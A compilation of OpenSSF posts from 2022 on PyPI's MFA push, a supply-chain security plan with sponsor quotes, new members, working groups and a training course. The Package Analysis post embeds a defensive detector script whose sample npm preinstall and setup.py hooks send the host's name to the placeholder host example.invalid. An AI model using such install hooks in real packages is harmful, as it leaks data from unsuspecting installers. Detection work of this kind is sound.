On July 8th, 2022, the Python Package Index (PyPI) announced a security key giveaway for maintainers of critical projects, where “critical” is a label given to the top 1% of packages on PyPI by download count during the prior six months. The giveaway included a statement of intent for PyPI to require multi-factor authentication (MFA) for maintainers of all critical projects “in the coming months.” This is similar to other efforts by GitHub, RubyGems, and npm to move to MFA. There was both commendation and concern for this effort.
We, the Open Source Security Foundation (OpenSSF), are a foundation working to improve the security of open source software (OSS). We’re comprised of organizations and individual OSS contributors from a variety of interests (including academic and commercial). We applaud these ongoing efforts because they help defend against the increasing attacks on OSS maintainers’ accounts that are occurring today.
Effort and concerns
The announcement from PyPI was met with a mixed response. Since the announcement, many maintainers have enabled MFA for their accounts, required it for their projects, and taken advantage of the security key giveaway. Others raised valid concerns, such as the incomplete universality of the MFA requirement, and a broader trend of increasing requirements placed on maintainers as a condition of using community infrastructure: expectations that they provide assurances not only about the quality and security of their open source software, but also about who they are and how they code.
There is a significant burden on repository operators in supporting MFA, particularly around user support and account recovery. To that end, PyPI, like many others (notably npm and RubyGems), is following a phased rollout approach using a metric that lets repository operators control the support burden while still delivering a benefit to repository users.
Maintainer burden is also a legitimate concern. As OSS grows in popularity, maintainers are increasingly asked to support the software they created, in many cases being asked to go beyond what they signed up for (e.g., providing useful code “as is”). The OpenSSF advocates for automated tooling and encourages security measures which minimize maintainer burden wherever possible. When considering adding security features that require any additional effort (one-time or recurring) on the part of project maintainers, we advocate for implementing those features with extreme consideration for the maintainers. This is especially important because OSS normally does not come with guarantees (unless separately contracted) and consumers rarely pay maintainers. It is perfectly reasonable for maintainers to be concerned about potentially significant burdens, especially since they might perceive these efforts as some kind of unpaid, implicit guarantee to which they have not agreed.
It is also worth noting that many repositories (including PyPI) are operated by OSS maintainers, and that account compromises present a significant burden on them and all other downstream users.
While no solution today is perfect, we strongly support PyPI’s efforts on their MFA rollout and hope the communities and maintainers will take advantage of this opportunity to lead the way in our first steps to more secure open source. In particular, PyPI organized a security key giveaway with sufficient supply to provide two keys (a primary and a backup) to each maintainer of critical packages. The security key implementation on PyPI uses the FIDO protocol, an existing standard. Furthermore, PyPI also supports using Time-based One-Time Password (TOTP) as an additional factor, which is widely available at zero cost in applications for all major operating systems, including several open source implementations. In short, they are taking steps to minimize maintainer burden as much as they can with technology currently available to the community.
The case for MFA
It’s important to understand that these moves towards MFA are not occurring in a vacuum. There are increasingly many cases where attackers take over open source developers’ accounts and leverage control of those accounts to change projects’ source code and/or deployed packages, with a potentially devastating impact on users.
Account compromise is the second most common supply chain attack (after typosquatting) on open source packages for dynamic programming languages like JavaScript, Python, and Ruby [“Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages”]. Account takeover is a direct focus of many attackers; “eslint-scope,” a package with millions of weekly downloads in npm, was compromised to steal credentials from users of the package.
Maintainer account takeovers can be drastically reduced when maintainers use MFA. That’s because attackers typically take over accounts by stealing or cracking passwords, or by doing “SIM swapping” attacks on smartphones. MFA with either TOTP or physical tokens blocks these attacks. This is more than hypothetical: Microsoft found that 99.9% of attempts at account takeover of their services are prevented by MFA.
Movement towards MFA is underway
It’s important to understand that the movement towards MFA is already underway; it’s not unique to PyPI:
Many other OSS-related services have not announced a requirement for MFA, but they do have support for MFA (and have had it for years in some cases).
Generally, users of OSS expect that the software source code and packages came from its OSS developers, not from attackers who have taken over developers’ accounts. MFA is a mechanism to help preserve that assumption.
Support from the OpenSSF
At the OpenSSF, our mission is to improve the security of the open source ecosystem for all participants: developers, users, and the critical infrastructure that enables our communities to interact and share.
We fully support the efforts of software repository operators in improving the trustworthiness of content in their repositories to help project maintainers and users. We believe that software repositories should continue to make changes which enable all users to have confidence in the integrity of the repository’s contents and in the mapping from the upstream source code to the artifacts in the repository.
The OpenSSF is already actively supporting PyPI and other software repositories through activities like the Securing Software Repositories working group and sponsorship and funding from the Alpha/Omega project that facilitates the implementation of much needed security features while minimizing hardship on maintainers. If you’re interested in helping to secure OSS, please join us through participation in the Securing Software Repositories working group or other OpenSSF activities!
10-Point Open Source and Software Supply Chain Security Mobilization Plan Released with Initial Pledges Surpassing $30M
WASHINGTON, DC – May 12, 2022 – The Linux Foundation and the Open Source Software Security Foundation (OpenSSF) brought together over 90 executives from 37 companies and government leaders from the NSC, ONCD, CISA, NIST, DOE, and OMB to reach a consensus on key actions to take to improve the resiliency and security of open source software.
Open Source Software Security Summit II is a follow-up to the first Summit, held January 13, 2022, which was led by the White House’s National Security Council. Today’s meeting was convened by the Linux Foundation and OpenSSF on the one-year anniversary of President Biden’s Executive Order on Improving the Nation’s Cybersecurity.
The Linux Foundation and OpenSSF, with input provided from all sectors, delivered a first-of-its-kind plan to broadly address open source and software supply chain security. The Summit II plan outlines approximately $150M of funding over two years to rapidly advance well-vetted solutions to the ten major problems the plan identifies. The 10 streams of investment include concrete action steps for both more immediate improvements and building strong foundations for a more secure future.
A subset of participating organizations have come together to collectively pledge an initial tranche of funding towards implementation of the plan. Those companies are Amazon, Ericsson, Google, Intel, Microsoft, and VMWare, pledging over $30M. As the plan evolves further, more funding will be identified, and work will begin as individual streams are agreed upon.
This builds on the existing investments that the OpenSSF community members make into open source software. An informal poll of our stakeholders indicates they spend over $110M and employ nearly a hundred full-time equivalent employees focused on nothing but securing the open source software landscape. This plan adds to those investments.
KEY QUOTES
Jim Zemlin – Executive Director, Linux Foundation: “On the one year anniversary of President Biden’s executive order, today we are here to respond with a plan that is actionable, because open source is a critical component of our national security and it is fundamental to billions of dollars being invested in software innovation today. We have a shared obligation to upgrade our collective cybersecurity resilience and improve trust in software itself. This plan represents our unified voice and our common call to action. The most important task ahead of us is leadership.”
Brian Behlendorf – Executive Director, Open Source Security Foundation (OpenSSF): “What we are doing here together is converging a set of ideas and principles of what is broken out there and what we can do to fix it. The plan we have put together represents the 10 flags in the ground as the base for getting started. We are eager to get further input and commitments that move us from plan to action.”
Anne Neuberger, Deputy National Security Advisor, Cyber & Emerging Tech at National Security Council, The White House:
“President Biden signed the Executive Order on Cybersecurity last year to ensure the software our government relies on is secure and reliable, including software that runs our critical infrastructure. Earlier this year, the White House convened a meeting between government and industry participants to improve the security of Open Source software. The Open Source security foundation has followed up on the work at that meeting and convened participants from across industry to make substantial progress. We are appreciative of all participants’ work on this important issue.”
Atlassian
Adrian Ludwig, Chief Trust Officer
“Open source software is critical to so many of the tools and applications that are used by thousands of development teams worldwide. Consequently, the security of software supply chains has been elevated to the top of most organizations’ priorities in the wake of recent high-profile vulnerabilities in open source software. Only through concerted efforts by industry, government and other stakeholders can we ensure that open source innovation continues to flourish in a secure environment. This is why we are happy to be participating in OpenSSF, where we can collaborate on key initiatives that raise awareness and drive action around the crucial issues facing software supply chain security today. We’re excited to be a key contributor to driving meaningful change and we are optimistic about what we can achieve through our partnership with OpenSSF and like-minded organizations within its membership.”
Cisco
Eric Wenger, Senior Director, Technology Policy, Cisco Systems
“Open source software (OSS) is a foundational part of our modern computing infrastructure. As one of the largest users of and contributors to OSS, Cisco makes significant investments in time and resources to improve the security of widely-used OSS projects. Today’s effort shows the stakeholder community’s shared commitment to making open-source development more secure in ways that are measurable and repeatable.”
Dell
Jim Medica, Technologist in Dell Technologies’ Office of the CTO:
“Never before has software security been a more critical part of the global supply chain. Today, in a meeting led by Anne Neuberger, Deputy National Security Advisor for Cyber and Emerging Technology, Dell and my Open Source Security Foundation colleagues committed our software security expertise to execute the Open Source Software Security Mobilization Plan. Dell’s best and brightest engineers will engage with peers to develop risk-based metrics and scoring dashboards, digital signature methodologies for code signing, and Software Bill of Materials (SBoM) tools – all to address the grand challenge of open source software security. This is an excellent example of the leadership Dell provides to proactively impact software security and open-source security solutions, and reinforces our commitment to the open source software community, to our supply chain and to our national security.”
Ericsson
Per Beming, Head of Standard and Industry Initiatives
“Ericsson is one of the leading promoters and supporters of the open source ecosystem, accelerating the adoption and industry alignment in a number of key technology areas. The Open Source Security Foundation (OpenSSF) is an industry-wide initiative with the backing of the Linux Foundation with the objective of improving supply chain security in the open source ecosystem.
“As a board member of OpenSSF, we are committed to open source security and we are fully supportive of the mobilization plan with the objective of improving supply chain security in the open source ecosystem. Being an advocate and adopter of global standards, the initiatives aim to strengthen open source security from a global perspective.”
“The security of open source is critical to the security of all software. Summit II has been an important next step in bringing the private and public sector together again and we look forward to continuing our partnerships to make a significant impact on the future of software security.”
Google
Eric Brewer, VP of Infrastructure at Google Cloud & Google Fellow
“We’re thankful to the Linux Foundation and OpenSSF for convening the community today to discuss the open source software security challenges we’re facing and how we can work together across the public and private sectors to address them. Google is committed to supporting many of the efforts we discussed today, including the creation of our new Open Source Maintenance Crew, a team of Google engineers who will work closely with upstream maintainers on improving the security of critical open source projects, and by providing support to the community through updates on key projects like SLSA, Scorecards, and Sigstore, which is now being used by the Kubernetes project. Security risks will continue to span all software companies and open source projects and only an industry-wide commitment involving a global community of developers, governments and businesses can make real progress. Google will continue to play our part to make an impact.”
IBM
Jamie Thomas, Enterprise Security Executive
“Today, we had the opportunity to share our IBM Policy Lab’s recommendations on how understanding the software supply chain is key to improving security. We believe that providing greater visibility in the software supply chain through SBoMs (Software Bill of Materials) and using the Open Source Software community as a valuable resource to encourage passionate developers to create, hone their skills, and contribute to the public good can help strengthen our resiliency. It’s great to see the strong commitment from the community to work together to secure open source software. Security can always be strengthened and I would like to thank Anne Neuberger today for her deep commitment and open, constructive, technical dialogue that will help us pave the way to enhancing OSS security.”
Intel
Greg Lavender, Chief Technology Officer and General Manager of the Software and Advanced Technology Group
“Intel has long played a key role in contributing to open source. I’m excited about our role in the future building towards Pat’s Open Ecosystem vision. As we endeavor to live into our core developer tenets of openness, choice and trust – software security is at the heart of creating the innovation platforms of tomorrow.”
Melissa Evers, Vice President, Software and Advanced Technology, General Manager of Strategy to Execution
“Intel commends the Linux Foundation in their work advancing open source security. Intel has a history of leadership and investment in open source software and secure computing: over the last five years, Intel has invested over $250M in advancing open-source software security. As we approach the next phase of Open Ecosystem initiatives, we intend to maintain and grow this commitment by double digit percentages continuing to invest in software security technologies, as well as advance improved security and remediation practices within the community and among those who consume software from the community.”
JFrog
Stephen Chin, Vice President of Developer Relations
“While open source has always been seen as a seed for modernization, the recent rise of software supply chain attacks has demonstrated we need a more hardened process for validating open-source repositories. As we say at JFrog, ‘with great software comes great responsibility’, and we take that job seriously. As a designated CNA, the JFrog Security Research team constantly monitors open-source software repositories for malicious packages that may lead to widespread software supply chain attacks and alerts the community accordingly. Building on that, JFrog is proud to collaborate with the Linux Foundation and other OpenSSF members on designing a set of technologies, processes, accreditations, and policies to help protect our nation’s critical infrastructure while nurturing one of the core principles of open source – innovation.”
JPMorgan Chase
Pat Opet, Chief Information Security Officer
“We are proud to have worked with Open Source Security Foundation (OpenSSF) and its members to create the new Open Source Software Security Mobilization Plan, This plan will help to address security issues in the software supply chain which is critical to making the world’s software safer and more secure for everyone.”
Microsoft
Mark Russinovich, CTO, Microsoft Azure
“Open source software is core to nearly every company’s technology strategy. Collaboration and investment across the open source ecosystem will strengthen and sustain security for everyone. Microsoft’s commitment to $5M in funding for OpenSSF supports critical cross-industry collaboration. We’re encouraged by the community, industry, and public sector collaboration at today’s summit and the benefit this will have to strengthen supply chain security.”
OWASP Foundation
Andrew van der Stock, Executive Director
“OWASP’s mission is to improve the state of software security around the world. We are contributing to the Developer Education and Certification, as well addressing the Executive Order for improving the state and adoption of SBOMs. In particular, we would like to see a single, consumable standard across the board.”
Mark Curphey (founder of OWASP) and John Viega (author of the first book on software security), Stream Coordinators
“We’re excited to see the industry’s willingness to come together on a single ‘bill of materials’ format. It has the potential to help the entire industry solve many important problems, including drastically improving response speed for when major new issues in open source software emerge.”
SAP
Tim McKnight, SAP Executive Vice President & Chief Information Security Officer
“SAP is proud to be a part of the Open Source Software Security Summit II and contribute to the important dialogue on the topic of Open Source software security.
“SAP is firmly committed to supporting the execution of the Open Source Software Security Mobilization Plan and we look forward to continuing our collaboration with our government, industry, and academic partners.”
Sonatype
Brian Fox, CTO of Sonatype and steward of Maven Central
“It’s rare to see vendors, competitors, government, and diverse open source ecosystems all come together like they have today. It shows how massive a problem we have to solve in securing open source, and highlights that no one entity can solve it alone. The Open Source Software Security Mobilization Plan is a great step toward bringing our community together with a number of key tactics, starting with securing OSS production, which will make the entire open source ecosystem stronger and safer.”
Wipro
Andrew Aitken, Global Head of Open Source
“Wipro is committed to helping ensure the safety of the software supply chain through its engagement with OpenSSF and other industry initiatives and is ideally suited to enhance efforts to provide innovative tooling, secure coding best practices and industry and government advocacy to improve vulnerability remediation.
“As the only global systems integrator in the OpenSSF ecosystem and in line with its support of OpenSSF objectives, Wipro will commit to training 100 of its cybersecurity experts to the level of trainer status in LF and OpenSSF secure coding best practices and to host training workshops with its premier global clients and their developer and cybersecurity teams.
“Further, Wipro will increase its public contributions to Sigstore and the SLSA framework by integrating them into its own solutions and building a community of 50+ contributors to these critical projects.”
KEY BACKGROUND
Three Goals of the 10-Point Plan
Securing Open Source Software Production
Make baseline secure software development education and certification the new normal for pro OSS developers
Establish a public, vendor-neutral, objective-metrics based risk assessment dashboard for the top 10,000 open source components.
Accelerate the adoption of digital signatures on software releases
Eliminate root causes of many vulnerabilities through replacement of non-memory-safe languages.
Improving Vulnerability Discovery and Remediation
Accelerate discovery of new vulnerabilities by maintainers and experts.
Establish the corps of “volunteer firefighter” security experts to assist open source projects during critical times.
Conduct third-party code reviews (and any necessary remediation work) of 200 of the most-critical open source software components yearly
Coordinate industry-wide data sharing to improve the research that helps determine the most critical open source software.
Shortening Ecosystem Patching Response Time
Software Bill of Materials (SBOM) Everywhere – improve SBOM tooling and training to drive adoption
Enhance the 10 most critical open source security build systems, package managers, and distribution systems with better supply chain security tools and best practices.
The 10-Point Plan Summarized (available in full here)
Security Education: Deliver baseline secure software development education and certification to all.
Risk Assessment: Establish a public, vendor-neutral, objective-metrics-based risk assessment dashboard for the top 10,000 (or more) OSS components.
Digital Signatures: Accelerate the adoption of digital signatures on software releases.
Memory Safety: Eliminate root causes of many vulnerabilities through replacement of non-memory-safe languages.
Incident Response: Establish the OpenSSF Open Source Security Incident Response Team, security experts who can step in to assist open source projects during critical times when responding to a vulnerability.
Better Scanning: Accelerate discovery of new vulnerabilities by maintainers and experts through advanced security tools and expert guidance.
Code Audits: Conduct third-party code reviews (and any necessary remediation work) of up to 200 of the most-critical OSS components once per year.
Data Sharing: Coordinate industry-wide data sharing to improve the research that helps determine the most critical OSS components.
SBOMs Everywhere: Improve SBOM tooling and training to drive adoption.
Improved Supply Chains: Enhance the 10 most critical OSS build systems, package managers, and distribution systems with better supply chain security tools and best practices.
We’re pleased to share that Brian Behlendorf, OpenSSF General Manager, testified to the United States House of Representatives Committee on Science, Space, and Technology today. Brian’s testimony shares the work being done within the Open Source Security Foundation and broader open source software community to improve security and trustworthiness of open source software.
A copy of Brian’s written remarks is linked here.
SAN FRANCISCO, May 9, 2022 – The Open Source Security Foundation (OpenSSF), a cross-industry organization hosted at the Linux Foundation that brings together the world’s most important software supply chain security initiatives, today announced 15 new members from leading software development, cybersecurity, financial services, communications, and academic sectors.
This round of commitments is led by two new premier members, Atlassian and Sonatype, who will join the OpenSSF governing board. New general member commitments come from Arnica, Bloomberg, Comcast, Cycode, F5, Futurewei Technologies, Legit Security, Sectrend, SUSE, and Tenable.
“We are thrilled to welcome Atlassian and Sonatype, two companies who play critical roles in modern software development and security, to the OpenSSF governing board,” said Brian Behlendorf, General Manager at OpenSSF. “Open source software supply chain attacks threaten the very foundations of innovation that billions of people rely upon. Our 15 new members join a growing community of organizations, developers, researchers, and security professionals that are investing time and resources required to respond in this constantly evolving threat landscape.”
Open source software has become the foundation on which our digital economy is built. As noted in the Linux Foundation’s 2022 Software Bill of Materials (SBOM) and Cybersecurity Readiness report, 98% of organizations use open source regularly. The same study revealed that 72% of organizations are very or extremely concerned about software security. Recent vulnerabilities, such as the one impacting Log4j, have caused many organizations to prioritize software supply chain security and realize the need to be fully abreast of the open source ecosystem, as well as contributing to it. From governments to businesses, open source security has been brought to the top of the agenda as a priority issue to address and as a result, OpenSSF is seeing membership rise at a rapid pace.
The latest commitments follow a productive period for OpenSSF in which the foundation expanded its core working groups to include Securing Software Repositories. This group aims to improve cybersecurity practices where developers download open source packages most often.
Furthermore, on June 20th, the foundation will host a full day of sessions at OpenSSF Day. Presentations, delivered by working group leaders, will include subjects such as Best Practice Badges and Other Good Practices, Three Things Your Open Source Project Must Consider, and Securing Critical Projects. The day will conclude with a panel discussion on the Future of Securing Open Source Software. Registration and attendance are free for all those attending the Open Source Summit conference.
Premier Member Quotes
Atlassian
“Open source software is critical to so many of the tools and applications that are used by thousands of development teams worldwide. Consequently, the security of software supply chains has been elevated to the top of most organizations’ priorities in the wake of recent high-profile vulnerabilities in open source software. Only through concerted efforts by industry, government and other stakeholders can we ensure that open source innovation continues to flourish in a secure environment. This is why we are happy to be joining OpenSSF, where we can collaborate on key initiatives that raise awareness and drive action around the crucial issues facing software supply chain security today. As a premier member, we’re excited to be a key contributor to driving meaningful change and we are optimistic about what we can achieve through our partnership with OpenSSF and like-minded organizations within its membership.” – Adrian Ludwig, Chief Trust Officer, Atlassian
Sonatype
“As the maintainers of the largest repository of open source components in Maven Central, we have a unique view into how great the demand for open source has become in recent years. However, as that demand has grown, bad actors have recognized the power of open source and are seeking to use that against the industry. As these software supply chain attacks become more commonplace, open source developers have become the frontline of this battle. Our key mission at Sonatype is to help people understand their software supply chain, and harness all of the good that open source has to offer, without any of the risk. OpenSSF and its members share a similar vision. I’m excited to play a bigger role in OpenSSF as a board member and collectively work with other members to keep open source ecosystems safe and secure, as we all figure out how to battle both new and old attacks on the community.” – Brian Fox, CTO and Co-founder, Sonatype
General Member Quotes
Arnica
“Software supply chain attack vectors have consistently caught the security community off-guard. Based on Arnica’s research across all attacks since 2018, we found two consistent root causes. One, improper access management to source code and two, inability to detect abnormal behavior in the developer toolset. The journey to solve these gaps is long and we are working on perfecting each risk mitigation strategy one-by-one, starting with introducing the first-ever self-service access management for GitHub.” – Nir Valtman, Co-Founder and CEO, Arnica
Bloomberg
“We are incredibly excited to join the Open Source Security Foundation (OpenSSF), whose values of public good, openness and transparency, and diversity, inclusion, and representation, align with those of Bloomberg. As an ‘Open Source First’ organization, we greatly value open source and its use within the finance sector, and we are fully committed to helping secure the open source software supply chain, something we have invested in via an ongoing collaboration between our CTO Office and Engineering organization.” – Gavin McNay, Security Architect in Bloomberg’s CTO Office
Comcast
“Comcast is committed to open source software. We use it to build products, attract talent, and develop our technology to improve the customer experience. When it comes to open source security, everyone plays a role. We are thrilled to join OpenSSF with the global open-source community to see how we can continue to evolve to make open-source development even more secure.” – Shilla Saebi, Open Source Program Office Lead, Comcast Cable
F5
“The growth of open source usage has magnified the importance of advancing OSS supply chain security for all, which can only be achieved as a shared priority among the industry. At F5, we are committed to ensuring our customers’ apps are fast, available and secure in any environment. That is why we value the work of the Open Source Security Foundation and its participating members, and look forward to sharing our domain expertise to help advance this important work.” – Geng Lin, EVP and Chief Technology Officer, F5
Futurewei Technologies
“OpenSSF is a premier and leading organization on open source security. Futurewei is very excited to join OpenSSF, and to engage in the conversations on the important topics of open source security and sustainability. We look forward to exciting discussions and collaborations with OpenSSF.” – Chris Xie, Head of Open Source Strategy and Business Development
Legit Security
“Legit Security is pleased to join OpenSSF to advance the security of software supply chains within the open-source ecosystem as well as giving organizations tools to secure the infrastructure that makes up the SDLC – such as pipelines and systems. Attacks on software supply chains are estimated to increase between three to six times per year and are a global threat. We look forward to working with OpenSSF to publish security research and contribute tools and code for more secure software delivery and consumption across the entire community.” – Liav Caspi, CTO of Legit Security
Sectrend
“We feel very excited to be a part of this industry-leading Open Source Security Foundation (OpenSSF). Together with other top-notch peers around the globe in various sectors under this initiative, we, Sectrend, are aiming to assist organizations of any size to address the security and license compliance risks from open-source software. Securing the software supply chain is very critical for every company. Within the framework of OpenSSF or the Linux Foundation, Sectrend will make a tremendous contribution to this community-driven process in tooling, training, research, best practices, and consulting. Beyond Security, More than Open Source.” – Alex Xue, CEO, Sectrend
SUSE
“According to recent research in an Economist Impact survey, 95% of organizations are practicing open innovation, demonstrating how open source software is critical to business’s infrastructure and applications. With this comes the need for software to be secure, which is why SUSE takes a proactive stance against security and compliance risks, leveraging tools for full lifecycle security including vulnerability management, CI/CD pipeline security, run-time security and government security certifications. SUSE is joining OpenSSF to further collaborate with the efforts to ensure the security of the open source software supply chain.” – Brent Schroeder, Head of SUSE’s Office of the CTO
Tenable
“We’re proud to be part of OpenSSF and join so many industry peers who understand the critical importance of securing open-source software and its associated supply chain. Log4j showed the world how pervasive OSS use is and how vulnerable it can be if the proper development and controls are not put in place to protect it. Tenable’s commitment to increasing visibility in attack surfaces includes shifting left to secure software development and helping organizations understand where the risks are throughout their systems.” – Glen Pendley, CTO, Tenable
The foundation also announced new Associate Members, including the Eclipse Foundation, China Academy of Information and Communications Technology (CAICT) and Chinese Academy of Sciences (ISCAS).
Read the OpenSSF and Harvard’s Census II Report, shedding light on the most commonly used FOSS packages at the application library level
About OpenSSF
Hosted by the Linux Foundation, the OpenSSF (launched in August 2020) is a cross-industry organization that brings together the industry’s most important open source security initiatives and the individuals and companies that support them. It combines the Linux Foundation’s Core Infrastructure Initiative (CII), founded in response to the 2014 Heartbleed bug, and the Open Source Security Coalition, founded by the GitHub Security Lab to build a community to support open source security for decades to come. The OpenSSF is committed to collaboration and working both upstream and with existing communities to advance open source security for all. For more information, please visit: https://openssf.org/
About the Linux Foundation
Founded in 2000, the Linux Foundation and its projects are supported by more than 1,800 members, and the Foundation is the world’s leading home for collaboration on open source software, open standards, open data, and open hardware. The Linux Foundation’s projects are critical to the world’s infrastructure, including Linux, Kubernetes, ONAP, Node.js, Hyperledger, RISC-V, and more. The Linux Foundation’s methodology focuses on leveraging best practices and addressing the needs of contributors, users, and solution providers to create sustainable models for open collaboration. For more information, please visit us at: linuxfoundation.org
By Caleb Brown and David A. Wheeler, on behalf of the Securing Critical Projects Working Group
Today we’re pleased to announce the initial prototype version of the Package Analysis project, an OpenSSF project addressing the challenge of identifying malicious packages in popular open source repositories. In just one month of analysis, the project identified more than 200 malicious packages uploaded to PyPI and npm.
The Package Analysis project seeks to understand the behavior and capabilities of packages available on open source repositories: what files do they access, what addresses do they connect to, and what commands do they run? The project also tracks changes in how packages behave over time, to identify when previously safe software begins acting suspiciously. This effort is meant to improve the security of open source software by detecting malicious behavior, informing consumers selecting packages, and providing researchers with data about the ecosystem. Though the project has been in development for a while, it has only recently become useful following extensive modifications based on initial experiences.
The vast majority of the malicious packages we detected are dependency confusion and typosquatting attacks. The packages we found usually contain a simple script that runs during an install and calls home with a few details about the host. These packages are most likely the work of security researchers looking for bug bounties, since most are not exfiltrating meaningful data except the name of the machine or a username, and they make no attempt to disguise their behavior. Still, any one of these packages could have done far more to hurt the unfortunate victims who installed them, so Package Analysis provides a countermeasure to these kinds of attacks.
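The two checks described above, an install-time hook that calls home and a package whose behaviour changes between versions, can be sketched as a small behaviour summarizer. This is an added illustration written for this page, not code from the Package Analysis project, which runs packages in a sandbox rather than pattern-matching their source. The `example-lib` package, its manifests, scripts and setup.py are constructed here; `example.invalid` is a reserved placeholder host; and the regex lists are illustrative assumptions, not the project's rules.

```python
import json
import re

# Illustrative patterns (assumptions, not the project's rules) for the three
# signals the post describes: code that runs at install time, outbound network
# activity, and reads of identifying host details such as hostname or username.
NETWORK_RE = re.compile(
    r"https?://|\bhttps?\.(?:get|request)\(|urllib\.request\.urlopen\(|"
    r"\brequests\.(?:get|post)\(|\bsocket\.(?:socket|create_connection)\(|\bfetch\("
)
HOST_INFO_RE = re.compile(
    r"os\.hostname\(|os\.userInfo\(|socket\.gethostname\(|getpass\.getuser\(|"
    r"os\.getlogin\(|platform\.node\(|process\.env\.(?:USER|HOME)\b"
)
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def summarize_npm(manifest_json, files):
    """Behaviour tags for an npm package: package.json text plus {path: source}.

    Network or host-info reads in a file named by an install hook are tagged
    'install:...'; the same reads elsewhere get a plain tag, because a library
    that fetches at runtime is not the same risk as one that phones home on install.
    """
    scripts = json.loads(manifest_json).get("scripts", {})
    hooks = [name for name in scripts if name in NPM_INSTALL_HOOKS]
    tags = {"install_hook"} if hooks else set()
    hook_cmds = " ".join(scripts[name] for name in hooks)
    for path, src in files.items():
        prefix = "install:" if path in hook_cmds else ""
        if NETWORK_RE.search(src):
            tags.add(prefix + "network")
        if HOST_INFO_RE.search(src):
            tags.add(prefix + "host_info")
    return tags


def summarize_setup_py(src):
    """Behaviour tags for a setuptools setup.py.

    setup.py itself executes when pip builds from source, so any network or
    host-info access in it is install-time; a custom install command or
    cmdclass entry is the explicit hook.
    """
    tags = set()
    if re.search(r"cmdclass\s*=|class\s+\w+\((?:\w+\.)?install\)", src):
        tags.add("install_hook")
    if NETWORK_RE.search(src):
        tags.add("install:network")
    if HOST_INFO_RE.search(src):
        tags.add("install:host_info")
    return tags


def calls_home_on_install(tags):
    """The pattern the post describes: an install-time hook that reaches the network."""
    return "install_hook" in tags and "install:network" in tags


def new_behaviours(previous, current):
    """Tags present in the newer version but absent from the older one."""
    return current - previous


# Constructed sample: v1.0.0 is a plain library; v1.0.1 adds a preinstall hook.
OLD_MANIFEST = json.dumps({"name": "example-lib", "version": "1.0.0",
                           "scripts": {"test": "node test.js"}})
OLD_FILES = {"index.js": "module.exports = (a, b) => a + b;",
             "test.js": "require('./index.js');"}
NEW_MANIFEST = json.dumps({"name": "example-lib", "version": "1.0.1",
                           "scripts": {"preinstall": "node collect.js",
                                       "test": "node test.js"}})
NEW_FILES = dict(OLD_FILES, **{"collect.js": (
    "const os = require('os');\n"
    "const https = require('https');\n"
    "https.get('https://example.invalid/?h=' + os.hostname());\n")})
SAMPLE_SETUP_PY = """
from setuptools import setup
from setuptools.command.install import install
import socket, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        urllib.request.urlopen('http://example.invalid/?h=' + socket.gethostname())

setup(name='example-lib', version='1.0.1', cmdclass={'install': PostInstall})
"""

if __name__ == "__main__":
    old = summarize_npm(OLD_MANIFEST, OLD_FILES)
    new = summarize_npm(NEW_MANIFEST, NEW_FILES)
    print("v1.0.0:", sorted(old))
    print("v1.0.1:", sorted(new), "new:", sorted(new_behaviours(old, new)))
    print("npm calls home on install:", calls_home_on_install(new))
    print("setup.py calls home on install:",
          calls_home_on_install(summarize_setup_py(SAMPLE_SETUP_PY)))
```

The version diff is the part worth keeping even when the patterns change: a package that gained an install hook and network access between two releases is exactly the "previously safe software begins acting suspiciously" case, and a runtime-only fetch in a library is deliberately not flagged as calling home.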
There are lots of opportunities for involvement with this project, and we welcome anyone interested in contributing to the future goals of:
detecting differences in package behavior over time;
automating the processing of the Package Analysis results;
storing the packages themselves as they are processed for long-term analysis;
and improving the reliability of the pipeline.
Check out our GitHub Project and Milestones for more opportunities, and feel free to get involved on the OpenSSF Slack. This project is one of the efforts of the OpenSSF Securing Critical Projects Working Group. You can also explore other OpenSSF projects like SLSA and Sigstore, which expand beyond the security of packages themselves to address package integrity across the supply chain.
Authors: Dustin Ingram (Google), Jacques Chester (Shopify)
A software repository is a critical component of any open source ecosystem: it provides a trusted central channel to publish, store and distribute open-source third-party software to all consumers. Package indexes and package managers exist for almost every software ecosystem, and share many of the same goals, features and threats.
But these repositories and related tooling have been developed independently, with little knowledge sharing between them over the years. This means the same problems get solved repeatedly, mostly in isolation. As it becomes more important to increase the overall security of these critical repositories, it has also become important for these repositories to collaborate and share knowledge.
Today, we’re announcing the creation of the Securing Software Repositories Working Group, a community collaboration with a focus on the maintainers of software repositories, software registries, and tools (like package managers) that rely on them, at various levels including system, language, plugin, extensions and container systems.
We’ve brought together many of the key maintainers, contributors and stakeholders of software repositories that are critical to many open source ecosystems, including Java, Node.js, Ruby, Rust, PHP, and Python, to participate in the group.
This working group provides a forum to share experiences and to discuss shared problems, risks and threats. It also provides a collaborative environment for aligning on the introduction of new tools and technologies to strengthen and secure our respective software repositories, such as Sigstore.
You can learn more about the working group’s objectives in our repository and charter, join our meetings via the public OSSF calendar, or find us on the OpenSSF Slack in the #securing_software_repos channel. If you maintain or operate a software repository system of any kind, please join in!
Log4Shell, SolarWinds Compromise, Heartbleed – cybersecurity breaches have become household names in recent years. These issues are costing organizations billions of dollars in prevention and remediation costs, yet at the same time they are becoming ever more common. Reacting to breaches after the fact is useful, but not enough; such reactions fail to protect users in the first place. Security needs to instead be baked into software before it’s released. Unfortunately, most software developers don’t know how to do this.
To alleviate this issue and improve access to cybersecurity training for everyone from developers to operations teams to end users, the Open Source Security Foundation (OpenSSF) has partnered with Linux Foundation Training & Certification to release a new, free, online training course, Developing Secure Software. Those who complete the course and pass the final exam will earn a certificate of completion valid for two years.
Geared towards software developers, DevOps professionals, software engineers, web application developers, and others interested in learning how to develop secure software, this course focuses on practical steps that can be taken, even with limited resources, to improve information security. The goal is to make it easier to create and maintain systems that are much harder to successfully attack, reduce the damage when attacks are successful, and speed the response so that any latent vulnerabilities can be rapidly repaired.
This course starts by discussing the basics of cybersecurity, such as what risk management really means. It discusses how to consider security as part of the requirements of a system, and what potential security requirements you might consider. It then focuses on how to design software to be secure, including various secure design principles that will help you avoid bad designs and embrace good ones. It also considers how to secure your software supply chain, that is, how to more securely select and acquire reused software (including open source software) to enhance security.
The course also focuses on key implementation issues and practical steps that you can take to counter the most common kinds of attacks. Discussion follows on how to verify software for security, including various static and dynamic analysis approaches, as well as how to apply them (e.g., in a continuous integration pipeline). It also discusses more specialized topics, such as the basics of how to develop a threat model and how to apply various cryptographic capabilities. The course content mirrors that in the Secure Software Development program we offer with edX, but in a single course instead of three.
